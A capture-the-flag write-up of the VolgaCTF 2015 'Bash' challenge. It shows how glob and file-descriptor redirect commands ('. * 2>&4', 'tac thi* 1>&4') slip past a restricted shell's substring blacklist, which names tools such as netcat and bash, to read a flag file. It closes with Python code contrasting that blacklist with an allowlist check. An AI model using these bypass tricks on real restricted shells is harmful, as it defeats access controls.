VolgaCTF 2015 Quals - Bash (125pts) writeup

The challenge description was: Just another super-puper secure shell. nc bash.2015.volgactf.ru 7777

A binary called tiny_bash was also provided.

Let's quickly check what happens when we connect to it:

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> help
>> ls
This command is prohibited.
>> exit
>> ^C

It appears to be a small shell that only allows a specific subset of commands to run. At this point it is probably quicker to check the binary and see if we can get the list of prohibited commands, to find out how we could bypass this restriction. A quick and dirty method is to run strings on the binary, which may yield the hard-coded list:

mrt:~/ctf/volga/pwn/bash$ strings tiny_bash
...
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
This command is prohibited.
This command is incorrect.
flag
bash
python
netcat
perl
args
pico
echo
grep
find
sudo
system
exec
regexp
tail
head
less
more
...

The list contains the usual commands, and even the word flag is in there. There are certainly more blocked commands than those shown, such as cat and awk. We first need a way to find out whether there are files in the current folder, and if so we will have to find a way to read them without the usual commands available.

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> . * 2>&4
sh: 1: .: this_file_contains_flag_cat_it.txt: not found

What happened here is the following: we used the source command (.) on every file in the current folder. source either runs the content of a script or complains with an error message, which often gives valuable information. Since we were interested in the errors, we redirected stderr to the socket (thanks to my teammate deception for showing me that). In this case the error gives us the name of the text file containing our flag: this_file_contains_flag_cat_it.txt

The cat command is of course forbidden, but there are still many ways to output the content of a file:

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> tac thi* 1>&4
flag{desire_is_the_key_to_motivation}>>

We used the command tac (concatenate and print files in reverse) and redirected stdout to our socket to get the flag. Another way would be using rev:

mrt:~/ctf/volga/pwn/bash$ nc bash.2015.volgactf.ru 7777
Welcome to our small secure shell.You are disallowed to execute several types ofcommands.Are you able to bypass these restrictions?
>> rev thi* 1>&4
}noitavitom_ot_yek_eht_si_erised{galf

We got our flag:

{desire_is_the_key_to_motivation}
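
The takeaway for anyone building such a wrapper: a blacklist of command words is checked before the shell expands globs and applies redirections, so it never sees what actually runs. The following is an added illustration, not the challenge's code: it models the filter as a substring blacklist built from the strings output above (the real binary's full list is unknown, so "ls", "cat" and "awk" are assumed additions), and compares it with an allowlist check that also rejects shell metacharacters. ALLOWED and SESSION are hypothetical.

```python
import re
import shlex

# Words recovered from `strings tiny_bash` in the writeup, plus "ls", "cat" and
# "awk", which the session and the text show are blocked too (assumption: the
# binary's complete list was never dumped).
PROHIBITED = {
    "flag", "bash", "python", "netcat", "perl", "args", "pico", "echo", "grep",
    "find", "sudo", "system", "exec", "regexp", "tail", "head", "less", "more",
    "ls", "cat", "awk",
}

def blacklist_allows(cmd: str) -> bool:
    """Model (assumed) of the challenge's check: reject the line if any prohibited
    word occurs anywhere in it, otherwise hand the line to `sh` unchanged."""
    return not any(word in cmd for word in PROHIBITED)

# Hardened variant: exact command name from an allowlist, no shell metacharacters
# (so no globbing, redirection or chaining), and argv meant for exec, not `sh -c`.
ALLOWED = {"help", "date", "uptime"}          # hypothetical allowlist
SHELL_META = re.compile(r"[*?\[\]{}$`|&;<>()\\\n~]")

def allowlist_allows(cmd: str) -> bool:
    if SHELL_META.search(cmd):                # `*`, `2>&4`, `|`, `$(...)` all fail here
        return False
    try:
        argv = shlex.split(cmd)
    except ValueError:                        # unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED

# The three lines typed in the writeup, the direct form the glob avoids, and a
# benign command (constructed sample input).
SESSION = [
    ". * 2>&4",
    "tac thi* 1>&4",
    "rev thi* 1>&4",
    "tac this_file_contains_flag_cat_it.txt 1>&4",
    "help",
]

def compare(lines=SESSION):
    """Return {line: (blacklist_verdict, allowlist_verdict)}, True = allowed."""
    return {line: (blacklist_allows(line), allowlist_allows(line)) for line in lines}

if __name__ == "__main__":
    for line, (bl, al) in compare().items():
        print(f"{line!r:48} blacklist={'pass' if bl else 'BLOCK':5} "
              f"allowlist={'pass' if al else 'BLOCK'}")
```

Note that the spelled-out filename is caught by the blacklist only because it happens to contain "flag" and "cat"; the glob thi* carries neither, which is exactly why the substring check is the wrong layer for this decision.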